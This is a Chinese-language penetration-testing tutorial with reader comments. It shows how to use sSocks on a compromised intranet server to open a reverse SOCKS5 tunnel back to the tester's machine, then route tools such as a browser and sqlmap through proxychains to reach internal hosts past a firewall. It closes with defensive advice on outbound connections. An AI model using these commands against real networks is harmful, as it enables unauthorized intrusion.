CVE漏洞中文网

0DayBank一个专门收集整理全球互联网漏洞的公开发布网站
  1. 首页
  2. 百科
  3. 正文

socks4代理

2017年5月23日 973点热度 0人点赞 0条评论
  • 首页
  • 分类阅读
  • 文库
  • 专栏
  • 公开课
  • 商城
  • 漏洞盒子
注册 | 登录
投稿

Socks代理反弹突破内网

fjhh2013-09-02共1156099人围观 ,发现 23 个不明物体系统安全

随着信息安全意识的提升,越来越多的信息系统前端均部署有防火墙,系统管理员根据业务需求将内部必要的服务端口通过端口映射等手段映射到公网中,如默认web服务端口80、MSSQL数据库服务端口1433等。通过部署防火墙可以将信息系统内部区域与公网逻辑隔离开来,利用相关的策略有效避免或减轻来自外部的攻击。

对于渗透测试者来说,如何绕过防火墙的阻挡在内网展开渗透测试成为亟需解决的问题,本文介绍了在夺取映射到外网的内网服务器权限后,如何利用socks代理反弹获得内网访问权限。

1. sSocks

sSocks是一个socks代理工具套装,可用来开启socks代理服务,支持socks5验证,支持IPV6和UDP,并提供反向socks代理服务,即将远程计算机作为socks代理服务端,反弹回本地,极大方便内网的渗透测试,其最新版为0.0.13,可在以下链接处下载。

http://sourceforge.net/projects/ssocks/

下载解压后,执行命令编译。

./configure && make

编译完成,进入src目录,会发现有nsocks、ssocksd、ssocks、rcsocks,其功能说明介绍如下:

程序 功能
nsocks 类似通过Socks5代理后的netcat,可用来测试socks server
ssocksd 用来开启Socks5代理服务
ssocks 本地启用Socks5服务,并反弹到另一IP地址
rcsocks 接收反弹过来的Socks5服务,并转向另一端口

2.模拟网络环境说明

本文模拟的网络环境见下图1,渗透测试端IP为192.168.10.50,内网区域IP段192.168.206.0/24,内网区域能正常访问192.168.10.0/24,现假设已获得192.168.206.130权限。

3.实施Socks代理反弹
1)本地监听端口
在渗透测试端192.168.10.50执行

./rcsocks -l 1088 -p 1080 -vv

等待远程Socks5服务器访问本地1080端口,创建端口1080与本地端口1088的连接通道,如图2。

2)开启Socks5代理服务,反弹
在192.168.206.130上执行

./rssocks -vv -s 192.168.10.50:1080

启用Socks5服务,反弹到192.168.10.50的端口1080上,如图3。

此时在渗透测试端192.168.10.50可看到通道连接成功,效果如图4。

4.利用proxychains进行Socks5代理
通过前面的步骤,Socks5代理已创建完成了。由于在渗透测试过程中,需要使用不同的工具程序,而在各程序中分别配置Socks5代理信息较为繁琐,而部分程序并不支持配置Socks5代理。为了简化这些操作,我们可以采用proxychains。
proxychains是一个代理客户端软件,可以支持几乎所有程序的代理,如ssh,telnet,ftp等。利用proxychains,程序能在代理的环境下被加载运行,而本身不需要具备代理功能。使用前需要对proxychains进行简单配置,打开配置文件proxychains.conf(在BT5位于/etc/proxychains.conf),如图5所示,在[ProxyList]处添加
socks5 127.0.0.1 1088

配置成功后若要启动程序,仅需要在启动程序命令前加上proxychains。
1)启用浏览器firefox,在终端执行命令:

proxychains firefox

firefox启动成功,访问192.168.206.135的web服务如图6,通过代理访问成功。

2)利用sqlmap进行注入:
先切换到sqlmap目录
cd /pentest/database/sqlmap
proxychains python sqlmap.py -u “存在SQL注入的链接” –dbs
注入成功,注入点信息及获取数据库信息如图7所示。

5.后记
由于系统管理员的疏忽或者业务需求所致,防火墙一般仅对由外向内发起的数据连接进行严格判断、过滤、甚至阻断而忽略由内往外的连接。因此,在此种情况下,通过攻陷映射到公网的端口服务,利用反弹便可获取内网访问权限,给内网安全带来极大的威胁。在信息安全建设与运维过程中,不仅要加强映射到公网的服务安全,也要重视由内到外连接的安全威胁。

fjhh1 篇文章等级: 1级
|
|
  • 上一篇:如何导出Windows哈希系列二
  • 下一篇:一次服务器被入侵后的分析

这些评论亮了

  • Mystery。(6级)肆零叁文化传媒 COO回复
    @anlfi  lcx.exe是李春晓私自更改了htran(红盟lion的2003年作品,修改自红盟bkbll写的linux下的socket代理工具trtool),linux下使用比较简单的端口转发工具是W.Z.T在2006年写的Lhtran
    你在当时估计还在上小学呢吧。
    )32(亮了
  • laterain回复
    话说msf里面就有这个sock模块,很方便,添加route之后,run一下这个模块就可以用proxychains去大杀特杀了。。。。
    )12(亮了
发表评论

已有 23 条评论

  • litdg (6级)FB作者 2013-09-02回复1楼

    nic3

    亮了(4)
  • laterain 2013-09-02回复2楼

    话说msf里面就有这个sock模块,很方便,添加route之后,run一下这个模块就可以用proxychains去大杀特杀了。。。。

    亮了(12)
    • Tback (1级) 2013-09-02回复

      @laterain 能否相许的说说怎么搞的??

      亮了(5)
    • 请叫我学弟 2015-01-10回复

      @ laterain 白神太吊·· 好厉害···

      亮了(2)
    • lalala 2016-07-14回复

      @ laterain 白神好厉害

      亮了(0)
  • Freedom 2013-09-02回复3楼

    赞一个

    亮了(2)
  • 菊花残满地伤 2013-09-02回复4楼

    我震精了,我穿越了?

    亮了(4)
  • Rozero (4级)酱油桑 2013-09-02回复5楼

    80%的安全风险是来自于内网的。

    亮了(2)
  • 来装x 2013-09-02回复6楼

    nsocks 类似通过Socks5代理后的netcat,可用来测试socks server
    ssocksd 用来开启Socks5代理服务
    ssocks 本地启用Socks5服务,并反弹到另一IP地址
    rcsocks 接收反弹过来的Socks5服务,并转向另一端口
    ———————————————————
    在被攻击的服务器上执行的"rssocks"这条命令是哪里来的,是不是这里"ssocks"呢?

    亮了(3)
  • LCX 2013-09-02回复7楼

    HD.EXE 一笑而过!

    亮了(2)
    • anlfi (5级) 2013-09-02回复

      @LCX 的确啊 当时hd 的确是渗透神器 代理转发 后门 映射 sockte 密码 基本都齐全了
      而且才30k 还是05年的产物
      http://huaidan.org/archives/2135.html
      不过还是要说一句的 这只是win平台
      linux hd.exe笑不过去 你说wine神马的就算了吧

      亮了(3)
      • Mystery。 (6级)肆零叁文化传媒 COO 2013-09-04回复

        @anlfi  lcx.exe是李春晓私自更改了htran(红盟lion的2003年作品,修改自红盟bkbll写的linux下的socket代理工具trtool),linux下使用比较简单的端口转发工具是W.Z.T在2006年写的Lhtran
        你在当时估计还在上小学呢吧。

        亮了(32)
      • ech0 2013-09-18回复

        @Mystery。 你胸罩掉了,晚上来如家808号房找我拿 :mrgreen:

        亮了(3)
  • cc 2013-09-03回复8楼

    现在有python 脚本实现socket 5 反弹的。 fjhh 是农大的那位吗?

    亮了(4)
  • cx20100102 (1级) 2013-09-05回复9楼

    渗透测试端192.168.10.50这台机器一般是我们的中转机器吧,或者说肉鸡,楼主说一下怎么从中转机转到本地浏览内网?

    亮了(3)
  • 河蟹 2013-09-09回复10楼

    木有技术含量。ls的说metasploit那个socket代理太卡了。不好用

    直接python或者其他软件开socket 然后lcx之类的东西把端口转发出来

    用sockcap或者 tsocket 加载需要的应用就可以了。

    亮了(3)
    • yplinfo (1级) 2013-09-12回复

      @河蟹 我用hd反弹回本地后,开启sockscap,但是好像mstsc、navicat等是代理过了,但hscan、nmap、telnet等不行。。。。哎

      亮了(3)
  • flowind 2013-09-28回复11楼

    弄内网的时候找这台能够外联的机子
    恼火…

    亮了(2)
  • lusiyu (1级) 2014-05-22回复12楼

    mark

    亮了(0)
  • edger_heaven 2014-05-29回复13楼

    使用cygwin编译了下,可以生成exe,但是在运行时报
    Segmentation fault (core dumped)
    错误,望有高人指点。

    亮了(0)
    • p1n3 2015-08-01回复

      @ edger_heaven
      换linux吧。。
      哈哈哈哈

      亮了(0)
  • hehe 2015-08-14回复14楼

    mark

    亮了(0)
  • 龙海 2017-03-31回复15楼

    现在是不是无法编译了

    亮了(0)

必须您当前尚未登录。登陆?注册

必须(保密)

表情插图

取消

fjhh

这家伙太懒,还未填写个人描述!

1 篇文章0 条评论

相关阅读

  • 解密”Qadars”银行木马
  • 为保护隐私而生,反取证操作系统:kodachi
  • Android系统调用hook研究(一)
  • 使用NTDSXtract离线抓取Domain Hash
  • 提取Android进程中的RSAPrivateCrtKey和证书

特别推荐

关注我们 分享每日精选文章

不容错过

  • 【已结束】2016 XPwn未来探索盛会图文直播(Live)ArthurKiller2016-08-31
  • 【已结束】2017年GeekPwn年中赛图文直播Sphinx2017-05-13
  • Pwn2Own战报:腾讯、360各显神通,分别秒杀IE、Flash、PDF项目hujias2015-03-19
  • “鑫胖”家的红星3.0系统被曝漏洞,可远程执行任意命令注入bimeover2016-12-07

FREEBUF

  • 免责声明
  • 关于我们
  • 加入我们

广告及服务

  • 寻求报道
  • 广告合作
  • 联系我们
  • 友情链接

关注我们

  • 官方微信
  • 新浪微博
  • 腾讯微博
  • Twitter

赞助商

Copyright © 2013 WWW.FREEBUF.COM All Rights Reserved 沪ICP备13033796号

css.php

正在加载中...

0daybank

标签: 暂无
最后更新:2017年5月23日

小助手

这个人很懒,什么都没留下

点赞
< 上一篇
下一篇 >

文章评论

您需要 登录 之后才可以评论

COPYRIGHT © 2024 www.pdr.cn CVE漏洞中文网. ALL RIGHTS RESERVED.

鲁ICP备2022031030号

联系邮箱:wpbgssyubnmsxxxkkk@proton.me